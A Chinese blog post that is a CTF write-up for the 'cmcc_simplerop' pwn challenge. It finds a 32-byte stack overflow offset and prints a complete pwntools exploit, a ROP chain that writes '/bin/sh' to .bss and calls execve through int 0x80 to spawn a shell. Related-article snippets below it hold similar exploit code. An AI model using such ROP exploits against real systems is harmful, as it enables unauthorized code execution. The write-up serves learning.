cmcc_simplerop解题过程

最新推荐文章于 2024-06-01 13:53:21 发布
最新推荐文章于 2024-06-01 13:53:21 发布
阅读量163 收藏 2
点赞数
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55013445/article/details/133255931
版权

分析

使用checksec分析可知,simplerop只开启了NX保护,即栈不可执行,于是只能从其他内存空间下手。

接着使用IDA进行反汇编,分析代码可知该程序使用了read函数,即存在栈溢出漏洞,但是如果把shell放在栈上肯定是行不通的。与此同时,注意read()中的函数,其输入的v4在bss段,而bss段是可执行的。

到此,思路明确,我们可以通过read()函数把shell写入其中,然后通过执行bss段的shell来获取"/bin/sh"权限。

解题

  1. 先利用cyclic计算偏移
pwndbg> cyclic 100
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa

pwndbg> r
Starting program: /home/henhen/Desktop/challenges/simplerop/simplerop 
ROP is easy is'nt it ?
Your input :aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa

Program received signal SIGSEGV, Segmentation fault.
0x61616169 in ?? ()

cyclic - l 0x61616169
32

得出偏移量为32

  1. 获取read函数地址,利用其写入ROP链,进行三次ret然后达成目的

ret流程图如下
ROP链控制流程

最终exp如下

from pwn import *

p = process('./simplerop')

read_addr = 0x806CD50

int_80h_addr = 0x080493e1

pop_edx_ecx_ebx_ret = 0x0806e850

pop_eax_ret = 0x080bae06

bin_sh_addr = 0x80eb584

payload = b'a' * 0x20 + p32(read_addr) + p32(pop_edx_ecx_ebx_ret) 
payload += p32(0) + p32(bin_sh_addr) + p32(8) 
#将/bin/sh写入bss段,read(0,bin_sh_addr,8),
#                       fd    buf     size
#写完之后返回read函数,输入下面的payload
payload += p32(pop_edx_ecx_ebx_ret) + p32(0) + p32(0) + p32(bin_sh_addr) + p32(pop_eax_ret) + p32(0xb) + p32(int_80h_addr)
#将int_80(11,bin_sh_addr,0,0)写入bss段
#   系统调用号 缓冲区地址 

p.sendline(payload)

p.send("/bin/sh\x00")

p.interactive()

总结

对于该类静态编译的题目,可以利用其可读可执行段(.bss)地址不改变,然后通过构造ROP链进行攻击,这里主要利用int 0x80系统调用执行execve(“/bin/sh”)来达成获取权限的目的。

mick0960
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CMCC--simplerop 题解
lifanxin的博客
03-28 1521
Write Up文件信息漏洞定位利用分析wp总结 文件信息   该样本是我在做BUUCTF上的题刷到的,该题目本身漏洞明显,利用起来也不算太难,不过在我查阅一下他人的wp后发现了多种解法,在这里做个记录和总结。   老规矩先来检查一下文件的信息,32位小端程序,且只开启了NX保护。 漏洞定位 程序本身采用的是静态链接,所以用IDA进行分析的时候会发现.text段中的函数特别多,当然这本身也是为了配合题目给出的提示方便我们利用这么多的gadgets构造ROP链。 然后我们在IDA中定位到main函数,可以
CMCC_cn_iPhone-15.5
05-20
移动运营商文件 CMCC_cn_iPhone-15.5
SCH-MSM8909_MAIN BOARD_CMCC_PVT_A
03-23
MSM8909的原理图,以及相关资料,SCH-MSM8909_MAIN BOARD_CMCC_PVT_A
cmcc_simplerop
01-07
思路 明显rop可以用工具但是需要自己调一下长度emem exp: from pwn import * from struct import pack #io=process('./simplerop') io=remote('node3.buuoj.cn',27913) io.recvuntil(':') # Padding goes here p = 'a'*0x14+p32(1)*3 p += pack('<I', 0x0806e82a) # pop edx ; ret p += pack('<I', 0x080ea060) # @ .data p += pack('<I', 0x080
Amigo_CMCC_Anjian.rar_Amigo_CMCC_Anji_UltraEdit_飞信
09-21
飞信 无UltraEdit-32 UltraEdit-32
cmcc--simplerop
03-28
cmcc pwn题样本,可以使用多种rop方式进行漏洞利用,打开自己的思路,wp链接: https://blog.csdn.net/A951860555/article/details/115286266
CMCC_cn_iPhone.ipcc
01-24
CMCC_cn_iPhone.ipcc
【pwn】cmcc_simplerop --rop链的构造
question55的博客
01-12 548
程序保护情况检查32位程序,堆栈不可执行主函数:左边又是一堆函数,file看一下发现是静态链接,那ret2libc不用考虑了,接着看一下有没有int 80那可以考虑利用rop链调用execve函数,用系统调用的函数参数是存在寄存器中的,但是本程序找不到/bin/sh的字符串,可以利用read函数读入/bin/sh字符串然后就是找gadgetexp:from pwn import *context(os='linux',arch='i386',log_level='debug')io=remote("node
【pwn】 cmcc_simplerop
Nothing
02-26 722
例行检查 ida打开二进制文件发现是静态链接的32位程序。main函数中存在溢出。用ROPgadget查找文件中的gadget。 ROPgadget --binary ./simplerop --only 'pop|ret' >> 1.txt 得到 发现存在 pop eax;ret pop edx;pop ecx;pop ebx;ret 这些就足够了,给寄存器赋值再用int 80...
BUUCTF-PWN-cmcc_simplerop
qq_41743240的博客
04-28 469
BUUCTF-cmcc_simplerop 开了NX IDA反编译 程序非常简单,漏洞也一眼可见 程序里面没有system,这题解法非常多,这里使用mprotect方法修改bss段,执行shellcode exploit: #coding:utf-8 from pwn import * #p=process('simplerop') p=remote('node3.b...
cmcc Simplerop
Morphy_Amo的博客
03-17 3923
rop
BUUCTF cmcc_simplerop
BengDouLove的博客
04-14 888
这道题打开ida又是那么一大堆一大堆的函数,也没有外部引用的段,所以就是静态链接把好多函数都链接进来了 所以就和 BUU上另一道 inndy_rop 一样,直接用ROPgadget 去找rop链 from struct import pack # Padding goes here p = '' p += pack('<I', 0x0806e82a) # pop edx ...
BUUCTF----cmcc_simplerop
qq_33010875的博客
09-28 358
环境:WSL2,ubuntu16.04,python2 常规checksec文件: ida反编译: 明显看到read函数会导致栈溢出 gdb调试程序: 用cyclic指令生成100个数字,运行程序: 求输入点到返回地址的偏移: 得到偏移是32,即0x20 值得一提的是,在ida中,我们可以看到偏移是0x18+0x04=0x1c,以gdb调试为准 原因可参考: https://blog.csdn.net/mcmuyanga/article/details/109260008 文件名给了提示,使用
Java网络编程(上)
最新发布
qq_34471880的博客
06-01 868
数据在网络的传输, 局域网的概念, 广域网的概念, 网络协议, TCP五层模型, 网络封装 网络分用
详解CMCC 2.0 PORTAL协议交互过程
06-10
CMCC 2.0 PORTAL 协议是中国移动推出的一种认证协议,用于移动互联网门户网站的用户身份认证。其交互过程如下: 1. 用户在移动互联网门户网站输入用户名和密码,提交认证请求。 2. 门户网站将认证请求发送给认证...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值